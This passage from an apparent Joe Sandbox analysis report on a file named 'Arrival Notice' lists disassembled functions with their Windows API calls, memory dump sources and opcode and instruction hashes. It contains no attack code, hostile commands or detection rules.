                  • Opcode Fuzzy Hash: dfc0a08e721e921c8fabf0ba0b09a28aa8f12ea6015c27fd16f5e78f59efe27d
                  • Instruction Fuzzy Hash: ED11E47A200301ABDB159F35D844EBB77B5EF85350B10402FF906CB3A4EB359841C799
                  Function 00447CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                  Download Yara Rule
                  APIs
                  • GetWindowLongW.USER32(?,000000F0), ref: 00447D0B
                  • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00447D2A
                  • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00447D42
                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0042B7AD,00000000), ref: 00447D6B
                    • Part of subcall function 003C9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 003C9BB2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Window$Long
                  • String ID:
                  • API String ID: 847901565-0
                  • Opcode ID: fb4ec7616f9ee17d5a0b0fd862ededdda92b1a0bcae0e2cf3075cc5f56ee73ad
                  • Instruction ID: 9502a619f76581275ba4b5a0a5738d3d65811a338fe4e85a7843c42d84d4f202
                  • Opcode Fuzzy Hash: fb4ec7616f9ee17d5a0b0fd862ededdda92b1a0bcae0e2cf3075cc5f56ee73ad
                  • Instruction Fuzzy Hash: 8C11D271615614AFDB109F28CC44E6A3BA9AF46360B15873AF839C72F0D7348D12CB48
                  Function 00445660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageW.USER32(?,00001060,?,00000004), ref: 004456BB
                  • _wcslen.LIBCMT ref: 004456CD
                  • _wcslen.LIBCMT ref: 004456D8
                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00445816
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: MessageSend_wcslen
                  • String ID:
                  • API String ID: 455545452-0
                  • Opcode ID: b5ee43619cffe3519101d017e9ef930069bd2b7b7f717f16a1f7be6ec4ef52c2
                  • Instruction ID: b9751d70f265d9cf5aee5b66006f917edc624abbadfa23e19d26e2d2460d0993
                  • Opcode Fuzzy Hash: b5ee43619cffe3519101d017e9ef930069bd2b7b7f717f16a1f7be6ec4ef52c2
                  • Instruction Fuzzy Hash: 3C11B475600604A7EF20EF61DC85AEF776CAF11764B104027F915DA182E778C985CB69
                  Function 003E1D09 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 675471de18940265148d8f35b03c814d4a575560f326f45bece1cbeca49fd9dd
                  • Instruction ID: 8a21bd9586e64a3c6367a1b59faaf1cffeef4cf3329d87d3ca2f3e767a497108
                  • Opcode Fuzzy Hash: 675471de18940265148d8f35b03c814d4a575560f326f45bece1cbeca49fd9dd
                  • Instruction Fuzzy Hash: 3501A2B22056AA7EF662167A6CC1F77661CDF823B8B360729F521551D2DB718C005160
                  Function 00411A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00411A47
                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00411A59
                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00411A6F
                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00411A8A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: MessageSend
                  • String ID:
                  • API String ID: 3850602802-0
                  • Opcode ID: 2020f0f188c1cdfff2488fca5808ebd5638fe5ba450cd266578fc183b123b451
                  • Instruction ID: da57bcb0c39a388bafd6d9ea33f23ecc3550f3126298bea19df1e42e38bf2310
                  • Opcode Fuzzy Hash: 2020f0f188c1cdfff2488fca5808ebd5638fe5ba450cd266578fc183b123b451
                  • Instruction Fuzzy Hash: D211FA3A901219FFEB119BA5C985FEDBB78EF04750F200096EA04B7290D6716E51DB98
                  Function 0041E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                  Download Yara Rule
                  APIs
                  • GetCurrentThreadId.KERNEL32 ref: 0041E1FD
                  • MessageBoxW.USER32(?,?,?,?), ref: 0041E230
                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0041E246
                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0041E24D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                  • String ID:
                  • API String ID: 2880819207-0
                  • Opcode ID: 47f3825189c9ea1c5667e46978ad20236020bd7a9490823534958dcad7d251c5
                  • Instruction ID: 9d1baa718632d7e97857ea4d91b0c8d1045588b61d85e75e7ab9eb083f584782
                  • Opcode Fuzzy Hash: 47f3825189c9ea1c5667e46978ad20236020bd7a9490823534958dcad7d251c5
                  • Instruction Fuzzy Hash: 89112B7AA04254BBD7019FA99C45ADF7FAC9B46310F14467BFC14D3391D2B4CD0087A8
                  Function 003DD1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                  Download Yara Rule
                  APIs
                  • CreateThread.KERNEL32(00000000,?,003DCFF9,00000000,00000004,00000000), ref: 003DD218
                  • GetLastError.KERNEL32 ref: 003DD224
                  • __dosmaperr.LIBCMT ref: 003DD22B
                  • ResumeThread.KERNEL32(00000000), ref: 003DD249
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Thread$CreateErrorLastResume__dosmaperr
                  • String ID:
                  • API String ID: 173952441-0
                  • Opcode ID: f86100e9109a7c1dc44c31905c445cd205709a11e9fadcbb507bd2536619570f
                  • Instruction ID: 61147b571caebada96c2fc4b7fb175762af1469bbe444c94741d0b004273230c
                  • Opcode Fuzzy Hash: f86100e9109a7c1dc44c31905c445cd205709a11e9fadcbb507bd2536619570f
                  • Instruction Fuzzy Hash: 3801D6378051047BC7125BA5EC45BAA7A6DEF82330F11062AF925962D0CB718901C7A0
                  Function 003B600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                  Download Yara Rule
                  APIs
                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 003B604C
                  • GetStockObject.GDI32(00000011), ref: 003B6060
                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 003B606A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: CreateMessageObjectSendStockWindow
                  • String ID:
                  • API String ID: 3970641297-0
                  • Opcode ID: 68c8180e1a7402be1096ade1ae8859b09b5519dffa7f9063bc7122d1a5386f43
                  • Instruction ID: 29638d6087a3ae17534d30918c02bd8bf42a5ebed79f1bd5811bf6e35bb4382b
                  • Opcode Fuzzy Hash: 68c8180e1a7402be1096ade1ae8859b09b5519dffa7f9063bc7122d1a5386f43
                  • Instruction Fuzzy Hash: AE11AD72506509BFEF126FA58C85EFABB6DEF093A8F050216FB0452021D7369C60DBA0
                  Function 003D3B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • ___BuildCatchObject.LIBVCRUNTIME ref: 003D3B56
                    • Part of subcall function 003D3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 003D3AD2
                    • Part of subcall function 003D3AA3: ___AdjustPointer.LIBCMT ref: 003D3AED
                  • _UnwindNestedFrames.LIBCMT ref: 003D3B6B
                  • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 003D3B7C
                  • CallCatchBlock.LIBVCRUNTIME ref: 003D3BA4
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                  • String ID:
                  • API String ID: 737400349-0
                  • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                  • Instruction ID: 41e4a5f51c487ca35437ab9abbc2382265f1fbd4bcf222199f1a363e8612fdc1
                  • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                  • Instruction Fuzzy Hash: 22012933100148BBDF125F95EC46EEB3B69FF48794F05401AFE485A221C732E961EBA1
                  Function 003E3073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,003B13C6,00000000,00000000,?,003E301A,003B13C6,00000000,00000000,00000000,?,003E328B,00000006,FlsSetValue), ref: 003E30A5
                  • GetLastError.KERNEL32(?,003E301A,003B13C6,00000000,00000000,00000000,?,003E328B,00000006,FlsSetValue,00452290,FlsSetValue,00000000,00000364,?,003E2E46), ref: 003E30B1
                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,003E301A,003B13C6,00000000,00000000,00000000,?,003E328B,00000006,FlsSetValue,00452290,FlsSetValue,00000000), ref: 003E30BF
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: LibraryLoad$ErrorLast
                  • String ID:
                  • API String ID: 3177248105-0
                  • Opcode ID: fa1d66bcee84a6aa63de95b33409c228ae257449272b24009c784b2b31dffc11
                  • Instruction ID: 8a8a5d67b9c686b8ef53282c85fd65dfb15f3e18f91e82c5ac53c953344ec01f
                  • Opcode Fuzzy Hash: fa1d66bcee84a6aa63de95b33409c228ae257449272b24009c784b2b31dffc11
                  • Instruction Fuzzy Hash: 4701FC36743272ABCB328B7A9C889677798AF45761B150730F907D31D0C721DD01C6D4
                  Function 00417464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
                  Download Yara Rule
                  APIs
                  • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0041747F
                  • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00417497
                  • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 004174AC
                  • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 004174CA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Type$Register$FileLoadModuleNameUser
                  • String ID:
                  • API String ID: 1352324309-0
                  • Opcode ID: 8111b6e9f28d3a874b165e38adaa58776e1b9bfdb59c32aa77c3af175eeb43f7
                  • Instruction ID: 9a439bf19d1033e49576d59771b13c3360cd04d8be62cbc390d002fca057ef9e
                  • Opcode Fuzzy Hash: 8111b6e9f28d3a874b165e38adaa58776e1b9bfdb59c32aa77c3af175eeb43f7
                  • Instruction Fuzzy Hash: DC11A1B5306310ABE7208F14DD48BD27BFCEB00B00F10856AE656D6151DB78E984DB99
                  Function 0041B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                  Download Yara Rule
                  APIs
                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0041ACD3,?,00008000), ref: 0041B0C4
                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0041ACD3,?,00008000), ref: 0041B0E9
                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0041ACD3,?,00008000), ref: 0041B0F3
                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0041ACD3,?,00008000), ref: 0041B126
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: CounterPerformanceQuerySleep
                  • String ID:
                  • API String ID: 2875609808-0
                  • Opcode ID: 3407d1d6c6ac7ce9d64b82cee26ff36ec9d561f51d8dd1de6e6b769ad9a89841
                  • Instruction ID: dd7a18f773df3246c5ae0bf46a42d2e7358ec3517df4d7e01ee14a81200d0fbd
                  • Opcode Fuzzy Hash: 3407d1d6c6ac7ce9d64b82cee26ff36ec9d561f51d8dd1de6e6b769ad9a89841
                  • Instruction Fuzzy Hash: 5511C430C0151CE7CF009FE4D9986EEBF78FF0A310F114096D941B2241CB345590CB99
                  Function 00412DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00412DC5
                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00412DD6
                  • GetCurrentThreadId.KERNEL32 ref: 00412DDD
                  • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00412DE4
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                  • String ID:
                  • API String ID: 2710830443-0
                  • Opcode ID: 5fd2203c994046baaf6b1375e09a45c131685cf33a365c48c11bbfbb118db1de
                  • Instruction ID: 1c528e1f7c6665b8eeef3df7f5d374f915a074fe75b0c34113ae9e298c57c5e2
                  • Opcode Fuzzy Hash: 5fd2203c994046baaf6b1375e09a45c131685cf33a365c48c11bbfbb118db1de
                  • Instruction Fuzzy Hash: 2EE092752422287BD7601BB2EC4DFEB3E6CEF43BA1F054026F105D10809AE4C881C6B5
                  Function 00448863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 003C9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 003C9693
                    • Part of subcall function 003C9639: SelectObject.GDI32(?,00000000), ref: 003C96A2
                    • Part of subcall function 003C9639: BeginPath.GDI32(?), ref: 003C96B9
                    • Part of subcall function 003C9639: SelectObject.GDI32(?,00000000), ref: 003C96E2
                  • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00448887
                  • LineTo.GDI32(?,?,?), ref: 00448894
                  • EndPath.GDI32(?), ref: 004488A4
                  • StrokePath.GDI32(?), ref: 004488B2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                  • String ID:
                  • API String ID: 1539411459-0
                  • Opcode ID: a54186c9bce0998b0be02697a6123a421f04c66a525b0df4dd7247c3fa227eda
                  • Instruction ID: 4b36283c8f84d48bdea9bdb0c23fe4879a12af866c8fb08b3601e320ddc2387b
                  • Opcode Fuzzy Hash: a54186c9bce0998b0be02697a6123a421f04c66a525b0df4dd7247c3fa227eda
                  • Instruction Fuzzy Hash: 47F05E3A042258FAEB126F94AC0EFCE3F59AF06310F088115FA11651E2C7795521CFED
                  Function 003C98B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                  Download Yara Rule
                  APIs
                  • GetSysColor.USER32(00000008), ref: 003C98CC
                  • SetTextColor.GDI32(?,?), ref: 003C98D6
                  • SetBkMode.GDI32(?,00000001), ref: 003C98E9
                  • GetStockObject.GDI32(00000005), ref: 003C98F1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Color$ModeObjectStockText
                  • String ID:
                  • API String ID: 4037423528-0
                  • Opcode ID: f6ecdc5c4fadf559a95904fa525c19e45e0b4b8b4357aacf0831acce4e7a6a1d
                  • Instruction ID: 947555c1834e5d29c6a72ca00af1b4168b1b3d30ed008e04df4955449073627a
                  • Opcode Fuzzy Hash: f6ecdc5c4fadf559a95904fa525c19e45e0b4b8b4357aacf0831acce4e7a6a1d
                  • Instruction Fuzzy Hash: 7AE06D35645280AAEB615B74AC49BE93F20AB16336F08822AF6FAA80E1C77156409F15
                  Function 0041162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON
                  Download Yara Rule
                  APIs
                  • GetCurrentThread.KERNEL32 ref: 00411634
                  • OpenThreadToken.ADVAPI32(00000000,?,?,?,004111D9), ref: 0041163B
                  • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004111D9), ref: 00411648
                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,004111D9), ref: 0041164F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: CurrentOpenProcessThreadToken
                  • String ID:
                  • API String ID: 3974789173-0
                  • Opcode ID: c9b08777db38089fd4b3cdb26b803d8cdf5b6760ce6afd0d8ca3db090257209f
                  • Instruction ID: df22b63f708e1ace97a271780b6bc4a5d7edb851701630e73835236ca25e7665
                  • Opcode Fuzzy Hash: c9b08777db38089fd4b3cdb26b803d8cdf5b6760ce6afd0d8ca3db090257209f
                  • Instruction Fuzzy Hash: 69E08635603211DBD7B01FE09D4DB873B7CAF567D1F184829F746C90A0DA784480CB98
                  Function 0040D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                  Download Yara Rule
                  APIs
                  • GetDesktopWindow.USER32 ref: 0040D858
                  • GetDC.USER32(00000000), ref: 0040D862
                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0040D882
                  • ReleaseDC.USER32(?), ref: 0040D8A3
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: CapsDesktopDeviceReleaseWindow
                  • String ID:
                  • API String ID: 2889604237-0
                  • Opcode ID: 3e09f71f57b052ec6dc26828db4eebb31d8eb9d0c954271ad97e847bdfc366a4
                  • Instruction ID: f7d7f422bcd9922e7c332ea9d5299ffecb1caee43761c75a6e0714cb7b412032
                  • Opcode Fuzzy Hash: 3e09f71f57b052ec6dc26828db4eebb31d8eb9d0c954271ad97e847bdfc366a4
                  • Instruction Fuzzy Hash: 3DE01275801204DFCB919FE0D848A6DBBB5FB09310F15D069F806E7250CB3849029F44
                  Function 0040D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                  Download Yara Rule
                  APIs
                  • GetDesktopWindow.USER32 ref: 0040D86C
                  • GetDC.USER32(00000000), ref: 0040D876
                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0040D882
                  • ReleaseDC.USER32(?), ref: 0040D8A3
                  Memory Dump Source
